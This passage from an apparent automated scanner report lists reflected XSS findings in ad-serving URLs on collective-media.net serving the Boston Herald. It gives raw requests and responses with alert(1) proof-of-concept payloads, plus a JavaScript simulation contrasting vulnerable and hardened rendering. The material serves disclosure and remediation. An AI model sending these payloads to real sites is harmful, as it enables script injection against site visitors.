Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 453
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:44 GMT
Connection: close
Set-Cookie: dc=sea-dc%22; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:44 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/news;sz=728x90;net=q1;ord=354527464?&86cf3'-alert(1)-'c4fb3c8bde4=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?"> ...[SNIP]...
4.21. http://a.collective-media.net/adj/q1.bosherald/news [sz parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/q1.bosherald/news
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1595'-alert(1)-'d3ce0ff70fa was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald/news;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/354527464/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=354527464?c1595'-alert(1)-'d3ce0ff70fa HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:43 GMT
Connection: close
Set-Cookie: dc=sea-dc7a1d176d1ddf45fe985559f7; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:43 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/news;sz=728x90;net=q1;ord=354527464?c1595'-alert(1)-'d3ce0ff70fa;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?"> ...[SNIP]...
4.22. http://a.collective-media.net/cmadj/cm.rev_bostonherald/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /cmadj/cm.rev_bostonherald/
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11b93'-alert(1)-'1cfbaccfaf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/cm.rev_bostonherald11b93'-alert(1)-'1cfbaccfaf5/;sz=728x90;net=cm;ord=%23PCACHEBUSTER;env=ifr;ord1=40053;cmpgurl=http%253A//bostonherald.com/includes/processAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 8338
Date: Sat, 17 Sep 2011 01:49:07 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-30420328179_1316224147","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_bostonherald11b93'-alert(1)-'1cfbaccfaf5&size=728x90&imp_id=cm-30420328179_1316224147,12298b058f07061&referrer=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CRight%2CBottom%26page%3Dbh.heraldint ...[SNIP]...
4.23. http://a.collective-media.net/cmadj/cm.rev_bostonherald/ [sz parameter]
Summary
Severity: High
Confidence: Firm
Host: http://a.collective-media.net
Path: /cmadj/cm.rev_bostonherald/
Issue detail
The value of the sz request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a58b8(a)cb7eca68845 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. One obstacle is visible in the response below: the object literal reads ad_h:, ad_w:a58b8(a)cb7eca68845, and an empty ad_h value is a JavaScript syntax error in its own right, so the script returned for this probe does not parse and the echoed expression never executes. Legitimate requests carry sz as a width-by-height pair (728x90 in 4.22), and ad_w and ad_h appear to be derived from its two halves; a manual check should start from inputs of that shape.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/cm.rev_bostonherald/;sz=a58b8(a)cb7eca68845 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 8090
Date: Sat, 17 Sep 2011 01:48:50 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... </scr'+'ipt>');var bap_rnd = Math.floor(Math.random()*100000); var _bao = { coid:44, nid:546, ad_h:, ad_w:a58b8(a)cb7eca68845, uqid:bap_rnd, cps:'' }; document.write('<img style="margin:0;padding:0;" border="0" width="0" height="0" src="http://c.betrad.com/a/4.gif" id="bap-pixel-'+bap_rnd+'"/> ...[SNIP]...
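Finding 4.23 differs from the rest of this section: the sz value lands in an object literal with nothing around it (ad_w:a58b8(a)cb7eca68845), so no quote character is needed to reach code context, a bare expression is already code. The following is an added example, not the ad server's code. It models the server as splitting sz on the letter x into ad_w and ad_h (an assumption, chosen because it reproduces the empty ad_h: in the response above), shows why the report's probe yields a script that does not even parse, shows against this simulated server what a size-shaped value would do, and contrasts an allow-listed rendering. The probe() stub stands in for alert; the size-shaped input is hypothetical.

```javascript
// Added example: simulates the unquoted-expression context of finding 4.23.
// Not the ad server's real code; the WxH split below is an assumption.

// Constructed inputs.
const GOOD_SZ = '728x90';                    // a legitimate size, as in the 4.22 request
const REPORT_PROBE = 'a58b8(a)cb7eca68845';  // the scanner's probe from the report
const SIZED_PROBE = '1x1-probe(1)';          // hypothetical: size-shaped, so both fields get a value

// Vulnerable (assumed server logic): split sz on 'x' and paste the halves, unquoted,
// into the _bao object literal. A missing half leaves "ad_h:," which is a syntax error,
// so the whole script fails to parse and nothing in it runs.
function renderBaoVulnerable(sz) {
  const [w, h] = sz.split('x');
  return 'var bap_rnd = Math.floor(Math.random()*100000);' +
    'var _bao = { coid:44, nid:546, ad_h:' + (h === undefined ? '' : h) +
    ', ad_w:' + w + ", uqid:bap_rnd, cps:'' };" +
    'return _bao;';
}

// Hardened: sz must be two bounded integers joined by 'x'; anything else is rejected
// and no script containing it is emitted at all. The numbers are emitted via
// JSON.stringify, which can only ever produce a numeric literal here.
function renderBaoHardened(sz) {
  const m = /^(\d{1,4})x(\d{1,4})$/.exec(sz);
  if (m === null) return null;
  const w = Number(m[1]);
  const h = Number(m[2]);
  return 'var bap_rnd = Math.floor(Math.random()*100000);' +
    'var _bao = { coid:44, nid:546, ad_h:' + JSON.stringify(h) +
    ', ad_w:' + JSON.stringify(w) + ", uqid:bap_rnd, cps:'' };" +
    'return _bao;';
}

// Compiles the generated script and, if it parses, runs it with a recording stub
// named probe() in scope (standing in for alert). Reports what happened.
function evaluate(src) {
  const calls = [];
  if (src === null) return { parses: false, calls, bao: null };   // rendering was refused
  let fn;
  try {
    fn = new Function('probe', src);
  } catch (e) {
    return { parses: false, calls, bao: null };                    // SyntaxError: nothing ran
  }
  const bao = fn((x) => { calls.push(x); return 0; });
  return { parses: true, calls, bao };
}

function demoExpressionContext() {
  return {
    good: evaluate(renderBaoVulnerable(GOOD_SZ)),             // parses, ad_w 728, no calls
    reportProbe: evaluate(renderBaoVulnerable(REPORT_PROBE)), // parses: false, because of "ad_h:,"
    sizedProbe: evaluate(renderBaoVulnerable(SIZED_PROBE)),   // parses, calls [1]
    hardened: evaluate(renderBaoHardened(SIZED_PROBE)),       // refused: parses false, no calls
  };
}
console.log(demoExpressionContext());
```

Run with node. The point of the hardened version is that in an unquoted context there is no escaping function that helps: the only safe output is a value drawn from a closed set (here, a bounded integer), so validation must happen before rendering and rejection must mean emitting nothing.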
4.24. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /cmadj/iblocal.revinet.bostonherald/audience
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67d0f'-alert(1)-'238029b5c84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj67d0f'-alert(1)-'238029b5c84/iblocal.revinet.bostonherald/audience;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER;env=ifr;ord1=449493;cmpgurl=http%253A//bostonherald.com/news/regional/view.bg%253Farticleid%253D1366356%2526position%253D1? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:29 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7400
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30221086088_1316222009","http://ad.doubleclick.net/adj67d0f'-alert(1)-'238029b5c84/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-30221086088_1316222009,12298b058f07061,polit,;;cmw=owl;sz=160x600;net=iblocal;env=ifr;ord1=449493;contx=polit;dc=s;btg=;ord=%23PCACHEBUSTER ...[SNIP]...
4.25. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /cmadj/iblocal.revinet.bostonherald/audience
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8c69'-alert(1)-'5b29faf592d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/iblocal.revinet.bostonheraldf8c69'-alert(1)-'5b29faf592d/audience;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER;env=ifr;ord1=449493;cmpgurl=http%253A//bostonherald.com/news/regional/view.bg%253Farticleid%253D1366356%2526position%253D1? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Date: Sat, 17 Sep 2011 01:13:33 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7392
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30501481718_1316222013","http://ad.doubleclick.net/adj/iblocal.revinet.bostonheraldf8c69'-alert(1)-'5b29faf592d/audience;net=iblocal;u=,iblocal-30501481718_1316222013,12298b058f07061,polit,;;sz=160x600;net=iblocal;env=ifr;ord1=449493;contx=polit;dc=s;btg=;ord=%23PCACHEBUSTER?","160","600",true);</scr'+'ipt> ...[SNIP]...
4.26. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /cmadj/iblocal.revinet.bostonherald/audience
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60a13'-alert(1)-'30c480b6c14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/iblocal.revinet.bostonherald/audience60a13'-alert(1)-'30c480b6c14;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER;env=ifr;ord1=449493;cmpgurl=http%253A//bostonherald.com/news/regional/view.bg%253Farticleid%253D1366356%2526position%253D1? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:37 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7392
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30201561711_1316222017","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience60a13'-alert(1)-'30c480b6c14;net=iblocal;u=,iblocal-30201561711_1316222017,12298b058f07061,polit,;;sz=160x600;net=iblocal;env=ifr;ord1=449493;contx=polit;dc=s;btg=;ord=%23PCACHEBUSTER?","160","600",true);</scr'+'ipt> ...[SNIP]...
4.27. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [sz parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /cmadj/iblocal.revinet.bostonherald/audience
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 743e9'-alert(1)-'e734a6f0a30 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/iblocal.revinet.bostonherald/audience;sz=743e9'-alert(1)-'e734a6f0a30 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:20 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7353
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... iveMedia.createAndAttachAd("iblocal-30322160699_1316222000","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-30322160699_1316222000,12298b058f07061,none,;;sz=743e9'-alert(1)-'e734a6f0a30;contx=none;dc=s;btg=?","743e9'-alert(1)-'e734a6f0a30","",true);</scr'+'ipt> ...[SNIP]...
4.28. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /cmadj/q1.bosherald/be_news
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80447'-alert(1)-'f91ca21afff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj80447'-alert(1)-'f91ca21afff/q1.bosherald/be_news;sz=300x250;net=q1;ord=2118037356?;env=ifr;ord1=36513;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Content-Length: 7358 Date: Sat, 17 Sep 2011 01:09:51 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30219867092_1316221791","http://ad.doubleclick.net/adj80447'-alert(1)-'f91ca21afff/q1.bosherald/be_news;net=q1;u=,q1-30219867092_1316221791,12298b058f07061,polit,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=36513;contx=polit;dc=s;btg=;ord=2118037356??","300","250",true);</scr'+'ipt> ...[SNIP]...
4.29. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 2]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /cmadj/q1.bosherald/be_news |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87eb6'-alert(1)-'9d423e3fbe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosherald87eb6'-alert(1)-'9d423e3fbe/be_news;sz=300x250;net=q1;ord=2118037356?;env=ifr;ord1=36513;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7357
Date: Sat, 17 Sep 2011 01:09:52 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30419616533_1316221792","http://ad.doubleclick.net/adj/q1.bosherald87eb6'-alert(1)-'9d423e3fbe/be_news;net=q1;u=,q1-30419616533_1316221792,12298b058f07061,polit,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=36513;contx=polit;dc=s;btg=;ord=2118037356??","300","250",true);</scr'+'ipt> ...[SNIP]...
4.30. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 3]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /cmadj/q1.bosherald/be_news |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7479'-alert(1)-'d7ae9e9aabb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosherald/be_newsc7479'-alert(1)-'d7ae9e9aabb;sz=300x250;net=q1;ord=2118037356?;env=ifr;ord1=36513;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7358
Date: Sat, 17 Sep 2011 01:09:53 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
